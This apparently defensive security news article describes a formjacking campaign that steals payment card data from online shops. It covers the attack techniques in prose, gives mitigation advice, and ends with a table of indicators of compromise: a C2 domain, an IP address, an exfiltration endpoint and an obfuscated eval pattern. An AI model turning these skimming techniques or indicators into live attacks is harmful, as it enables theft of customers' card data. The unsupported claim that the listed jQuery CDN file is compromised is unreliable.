A new wave of cyberattacks using formjacking malware has been detected, specifically targeting e-commerce platforms to exfiltrate payment card information.
Cybersecurity researchers observed that threat actors are leveraging sophisticated JavaScript-based payloads, which inject malicious code directly into the client-side payment forms of vulnerable online retailers.
The primary objective is to intercept and exfiltrate sensitive payment data, including credit card numbers, expiration dates, CVVs, and cardholder names as customers complete their transactions.
Sophisticated Threats Exploit Online Payment Forms
Formjacking, also referred to as web skimming, has evolved as attackers refine their techniques to bypass common security controls.
Recent incidents highlight the use of highly obfuscated scripts, often delivered through compromised third-party services or direct exploitation of website backends.
The injected scripts are triggered upon page load or form submission, silently capturing input fields and transmitting the harvested data to remote command-and-control (C2) servers controlled by the attackers.
Investigations have revealed that adversaries are increasingly employing real-time evasion tactics.
For instance, malicious scripts can fingerprint visiting clients to ensure payloads are not exposed to security analysts or automated scans.
Data exfiltration methods have also progressed, with attackers utilizing HTTPS POST requests, websocket communications, and even DNS tunneling to stealthily transfer stolen information.
E-commerce platforms running outdated content management systems or plugins are at heightened risk, as these vulnerabilities are commonly exploited vectors for initial access.
In several observed breaches, attackers maintained persistent access by deploying backdoors or modifying core scripts within the payment workflow.
Security teams noted that the malicious code often contains self-destruct or update mechanisms, enabling attackers to remove evidence if detection is imminent.
Incident Response Accelerated
Leading cybersecurity vendors have responded by releasing updated signatures and YARA rules to identify and quarantine formjacking threats.
However, the rapid mutation of malware strains and the use of living-off-the-land techniques complicate defense efforts.
Threat intelligence analysts recommend regular integrity checks of critical web assets, enhanced monitoring of third-party dependencies, and adopting Content Security Policies (CSP) to mitigate script injection risks.
Victim organizations have been urged to conduct thorough incident response processes, including forensic analysis and end-to-end review of web application logs.
Customer notification and credit monitoring are advised where payment data compromise is suspected.
Law enforcement agencies, in collaboration with private sector partners, are investigating cross-border syndicates believed to be orchestrating these attacks.
The prevalence of formjacking underscores the necessity for robust web security posture management.
As attackers continue to innovate, only layered defenses, routine code audits, and real-time threat intelligence sharing offer viable protection for merchants and their customers.
Indicators of Compromise (IOC)
| IOC Type | Example Value | Description |
|---|---|---|
| Malicious JS File | /assets/js/checkout.min.js | Injected JavaScript file with payload |
| Suspicious Domain | paysecure-online[.]com | C2 domain used for data exfiltration |
| IP Address | 185.243.115.12 | IP hosting malware payloads |
| Obfuscated Script Function | eval(atob(‘...’)) | Encoded function executing malicious code |
| Unusual POST Request Path | /submit/cardinfo.php | Endpoint receiving intercepted data |
| Modified Web Asset Hash | SHA256: 9fc9b2e6... | Tampered asset hash for integrity check |
| Third-Party Library Source | cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.js | Compromised vendor script (modified) |
| User Agent String | Mozilla/5.0 (compatible; Googlebot/2.1;) | Spoofed to evade detection |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Warning for WordPress Admins – Fake SEO Plugins Hijacking Websites")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Apache APISIX Flaw Enables Unauthorized Cross-Issuer Access Due to Misconfigurations")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Instagram Adopts Daily TLS Certificate Rotation with One-Week Validity")
